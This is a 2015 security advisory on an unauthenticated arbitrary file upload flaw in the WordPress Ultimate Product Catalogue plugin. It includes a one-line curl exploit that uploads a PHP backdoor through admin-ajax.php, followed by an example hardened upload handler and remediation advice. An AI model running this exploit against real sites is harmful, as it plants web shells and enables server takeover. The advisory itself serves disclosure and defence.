Title: WordPress Ultimate Product Catalogue Vulnerability
Date: 22 April 2015
Author: Luca Ercoli
Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/
Vulnerability Discussion: http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability
Version: 3.1.4
Tested on: 3.1.1 (and previous versions)
Product Description:
-------------------
The Ultimate Product Catalogue plugin is designed to help WordPress site administrators display products quickly and easily in an attractive and customizable layout, making the catalogue easy to browse, sort and update with categories, sub-categories, and tags.
Vulnerability Summary:
----------------------
Severity: Critical
Class: Unauthenticated Arbitrary File Upload
Remote: Yes
Vulnerable: WordPress Ultimate Product Catalogue Plugin 3.1.1 (and previous versions)
Credit: Luca Ercoli
http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability
The vulnerability is caused by the use of user-supplied input without proper validation.
By sending a specially crafted HTTP POST request, a remote unauthenticated attacker can exploit this issue to upload arbitrary files and execute them in the context of the web server process.
Vulnerability Description:
--------------------------
Full disclosure and a proof-of-concept (PoC) exploit at:
http://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability
Exploit:
curl -v -k -X POST -F "Products_Spreadsheet=@./backdoor.php" "www.site.tld/wp-admin/admin-ajax.php?action=widgets_init&Action=UPCP_AddProductSpreadsheet"
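The request above reaches the upload code through admin-ajax.php without any logged-in session and with a PHP file in the spreadsheet field, so a fix has to address both the missing authentication and the missing file validation. The handler below is an added example written for this advisory, not the Ultimate Product Catalogue plugin's own code and not the vendor's patch; the hook name, nonce action, capability, size limit and storage directory are assumptions, while the Products_Spreadsheet field name is taken from the exploit request.

```php
<?php
/**
 * Hypothetical hardened AJAX spreadsheet-upload handler for a WordPress plugin.
 * Added example for this advisory; not the Ultimate Product Catalogue code.
 * Hook name, nonce action, capability, size cap and target directory are assumptions.
 */

// Register only on the authenticated wp_ajax_ hook. No wp_ajax_nopriv_ variant,
// and no dispatching from a hook that admin-ajax.php fires for anonymous
// requests as well, so an unauthenticated POST never reaches this function.
add_action( 'wp_ajax_example_add_product_spreadsheet', 'example_add_product_spreadsheet' );

function example_add_product_spreadsheet() {
    // 1. Authorization: only users allowed to manage the site may import catalogue data.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }

    // 2. CSRF protection: the request must carry a valid nonce in the 'nonce' field.
    check_ajax_referer( 'example_spreadsheet_upload', 'nonce' );

    // 3. The file must actually come from this HTTP upload.
    if ( empty( $_FILES['Products_Spreadsheet'] )
        || ! is_uploaded_file( $_FILES['Products_Spreadsheet']['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'No file uploaded' ), 400 );
    }
    $file = $_FILES['Products_Spreadsheet'];

    // 4. Allow-list of spreadsheet extensions and MIME types. wp_check_filetype_and_ext()
    //    checks the extension against the list and, where it can, the file contents;
    //    anything else (including .php or a .php disguised as .csv) is rejected.
    $allowed = array(
        'csv'  => 'text/csv',
        'xls'  => 'application/vnd.ms-excel',
        'xlsx' => 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
    );
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) || ! isset( $allowed[ $check['ext'] ] ) ) {
        wp_send_json_error( array( 'message' => 'Only CSV/XLS/XLSX spreadsheets are accepted' ), 415 );
    }

    // 5. Size cap (assumed limit of 5 MiB).
    if ( $file['size'] > 5 * 1024 * 1024 ) {
        wp_send_json_error( array( 'message' => 'File too large' ), 413 );
    }

    // 6. Store under a server-chosen name with the validated extension; the
    //    client-supplied file name is never used to build the destination path.
    $uploads   = wp_upload_dir();
    $safe_name = 'catalogue-import-' . wp_generate_password( 12, false ) . '.' . $check['ext'];
    $target    = trailingslashit( $uploads['basedir'] ) . 'spreadsheet-imports/' . $safe_name;
    wp_mkdir_p( dirname( $target ) );
    if ( ! move_uploaded_file( $file['tmp_name'], $target ) ) {
        wp_send_json_error( array( 'message' => 'Could not store file' ), 500 );
    }

    wp_send_json_success( array( 'stored_as' => $safe_name ) );
}
```

With this handler in place, the curl request from the advisory would be refused at step 1 (no session, so the wp_ajax_ hook never runs), and a logged-in user posting backdoor.php would be refused at step 4. As a defence in depth, the spreadsheet-imports directory should additionally be configured in the web server so that PHP is not executed from it, which limits the impact even if a validation bug is found later.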
Vendor Response:
----------------
According to the vendor, a software version that fixes this vulnerability has been released and is available for download.